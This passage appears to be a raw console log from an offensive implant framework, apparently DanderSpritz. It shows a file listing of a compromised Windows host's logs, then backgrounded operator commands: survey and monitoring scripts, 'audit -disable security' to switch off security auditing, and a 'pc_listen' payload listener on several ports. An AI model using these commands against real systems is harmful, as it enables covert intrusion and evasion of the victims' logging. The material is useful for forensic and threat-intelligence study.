| 2017-04-28 16:34:55 | 37880 | C:\Windows\System32\wdi | BootPerformanceDiagnostics_SystemData.bin |
| 2017-04-28 16:34:54 | <DIR> | C:\Windows\System32\wdi | {86432a0b-3c7d-4ddf-a89c-172faa90485d} |
| 2017-04-28 16:34:53 | 4980736 | C:\Windows\System32\wdi\LogFiles | BootCKCL.etl |
| 2017-04-28 16:32:47 | 212992 | C:\Windows\System32\wdi\LogFiles | WdiContextLog.etl.001 |
| 2017-04-28 16:34:55 | 5342 | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d} | S-1-5-21-3463664321-2923530833-3546627382-1000_UserData.bin |
| 2017-04-28 16:34:54 | <DIR> | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d} | {577acaf2-2396-41ba-ba84-dfccf3d45721} |
| 2017-04-28 16:32:47 | 212992 | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{577acaf2-2396-41ba-ba84-dfccf3d45721} | snapshot.etl |
| 2017-04-28 16:34:07 | 0 | C:\Windows\System32\wfp | wfpdiag.etl |
| 2017-04-28 16:33:04 | 1118208 | C:\Windows\System32\winevt\Logs | Application.evtx |
| 2017-04-28 16:33:06 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-BranchCacheSMB%%%%4Operational.evtx |
| 2017-04-28 16:33:06 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Dhcpv6-Client%%%%4Admin.evtx |
| 2017-04-28 16:34:57 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Diagnosis-DPS%%%%4Operational.evtx |
| 2017-04-28 16:34:57 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Diagnostics-Performance%%%%4Operational.evtx |
| 2017-04-28 16:33:06 | 1118208 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-GroupPolicy%%%%4Operational.evtx |
| 2017-04-28 16:33:40 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-HomeGroup Provider Service%%%%4Operational.evtx |
| 2017-04-28 16:33:04 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Kernel-WHEA%%%%4Operational.evtx |
| 2017-04-28 16:36:36 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Known Folders API Service.evtx |
| 2017-04-28 16:33:19 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-NetworkProfile%%%%4Operational.evtx |
| 2017-04-28 16:33:05 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-OfflineFiles%%%%4Operational.evtx |
| 2017-04-28 16:42:10 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-ReliabilityAnalysisComponent%%%%4Operational.evtx |
| 2017-04-28 16:33:22 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Resource-Exhaustion-Detector%%%%4Operational.evtx |
  914. | 2017-04-28 16:33:22 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-TerminalServices-LocalSessionManager%%%%4Operational.evtx |
  915. | 2017-04-28 16:33:18 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-TerminalServices-RemoteConnectionManager%%%%4Operational.evtx |
  916. | 2017-04-28 16:33:19 | 1118208 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-User Profile Service%%%%4Operational.evtx |
  917. | 2017-04-28 16:35:21 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Windows Defender%%%%4WHC.evtx |
  918. | 2017-04-28 16:33:19 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Windows Firewall With Advanced Security%%%%4Firewall.evtx |
  919. | 2017-04-28 16:40:10 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-WindowsBackup%%%%4ActionCenter.evtx |
  920. | 2017-04-28 16:36:13 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-WindowsUpdateClient%%%%4Operational.evtx |
  921. | 2017-04-28 16:33:04 | 4263936 | C:\Windows\System32\winevt\Logs | Security.evtx |
  922. | 2017-04-28 16:33:02 | 3215360 | C:\Windows\System32\winevt\Logs | System.evtx |
  923. | 2017-04-28 16:33:06 | 6 | C:\Windows\Tasks | SA.DAT |
  924.  
  925. Command completed successfully
  926.  
  927. - [2017-04-28 09:52:59 z0.0.0.11] Commands currently running in the background:
  928. | ID | Target | Full Command | Sent | Received |
  929. +-----+-----------+--------------------------------------------------------------------------------------------------------+------+----------+
  930. | 145 | z0.0.0.11 | keepalive -delay 1m | 109 | 0 |
  931. | 214 | z0.0.0.11 | script Connected/Connected.dss | 0 | 0 |
  932. | 215 | z0.0.0.11 | python Connected/Connected.py -project Ops | 0 | 0 |
  933. | 230 | z0.0.0.11 | python survey.py -args " -run " | 0 | 0 |
  934. | 234 | z0.0.0.11 | background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s "processes -monitor " " | 0 | 0 |
  935. | 235 | z0.0.0.11 | background log=monitor guiflag=monitor processes -monitor | 236 | 966 |
  936. | 311 | z0.0.0.11 | stopaliasing dst=z0.0.0.11 audit -disable security | 152 | 14 |
  937. | 323 | z0.0.0.11 | netconnections -monitor | 175 | 439 |
  938. | 327 | z0.0.0.11 | arp -delay 10s -monitor | 169 | 382 |
  939.  
  940. Command completed successfully
  941.  
  942. Command completed successfully
  943.  
  944. Command completed successfully
  945.  
  946. Command completed successfully
  947. [16:52:59] Backgrounded 'pc_listen -key "Default" -payload "Danderspritz" -run "memlib" -tcp "443 80 53 1509" ' Id: 134